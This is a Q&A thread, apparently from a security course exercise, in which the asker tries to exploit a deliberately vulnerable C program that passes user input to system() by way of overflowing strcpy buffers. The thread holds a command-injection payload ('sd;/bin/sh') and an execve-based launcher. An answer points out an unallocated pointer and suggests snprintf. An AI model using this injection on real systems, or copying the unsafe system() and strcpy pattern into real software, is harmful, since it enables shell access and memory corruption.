# more than one command for system call in linux

Tags: linux, command-line-arguments, system-calls, execve

I am trying to execute a program (say target.c) that has the following

```
void foo(char * arg)
{
    char cmd[16];
    char par[16]; 
    char * p;
    strcpy(cmd, "ls --color -l ");
    strcpy(par, arg);
    printf("You can use \"%s %s\" to list the files in dir \"%s\"!\n",cmd, par, par);
    p = (char*)malloc(strlen(cmd) + strlen(par) + 2);
    strcpy(p, cmd);
    strcat(p, " ");
    strcat(p, par);        
    system(p);
}
int main(int argc, char ** argv)
{         
  int i;
  char test[256];
  if (argc > 1)
      foo(argv[1]);
  else
      printf("usage: %s dir\n", argv[0]);
  return 0;
  foo(test);
};
```

Now i am trying to get shell by invoking it from another program (it is important to invoke from another program shown below:

```
int main(int argc, char **argv)
{
    char * arrv[] = {NULL};
    char  *payload;
    int i; int j;
    char * argo[] = {"../targets/target1","sdknsd",NULL};
    strcpy(payload,"sd;/bin/sh");
    argo[1] = payload;
    i=fork();
    if(i == 0)
    {
        execve("../targets/target1" ,argo, arrv );
        exit(1);
    }
    else if(i == -1)
    {
        perror("fork()");
    }
}
```

My question is when I try to execute the target and provide command line arguments something ; /bin/sh then I get the shell but not in case of invoking from execve.
Any help would be really appreciated

Alright here is the output:

```
[hvalayap@localhost targets]$ ./target1 ds;/bin/sh 
ls: ds: No such file or directory
sh-2.05$
```

The above program appends the user input string onto ls and passes it to system hence system(ls ds;/bin/sh " gives me shell

But when I try to do the same with execve from another program(the second program) it doesn't work
says  "ds" directory not found

Comment: I am tried using && between the arguments(as suggested in another post) and it still doesn't work!And I am sorry about the bad formatting!

Comment: I am sorry too. I think you need to be more clear regarding the error you experience. Can you paste the output when you try to run the program and how you run it?

Comment: Thanks for your reply! I have updated the output, I am really sorry because I have to get this done soon! I ll reformat once I finish this task

Comment: Well, without looking more closely at the code and only focusing on the output, do you have a file or directory called "ds" in that path? If not, what is it you are trying to achieve by invoking your program with the argument "ds;/bin/sh" ? Are you the author of the code?

Comment: Thank you everyone for your replies . I have to exploit the vulnerability in the function foo. The aim is to get a shell. Since foo takes user input and passes to system(), I am trying to pass a random string(ds) followed by "; /bin/sh"  I got the issue sorted now, I just wrote a shell script that passes the argument to the C file

Answer (score 0):

Look at your code very carefully. The **char *payload** is on stack, and then you **strcpy** at this address, hence you overwrite local variables on stack. You didn't allocate memory for this pointer (e.g. malloc or use local static buffer). If user input string will be more longer (say 255 symbols) you cat get Segmentation fault error.

BTW: Why wouldn't you use **snprintf** instead **strcpy**? More security carfully I suppose.

Comment: Thanks for your reply . I realize that how big a blunder is this now . And agree to your suggestion about sprintf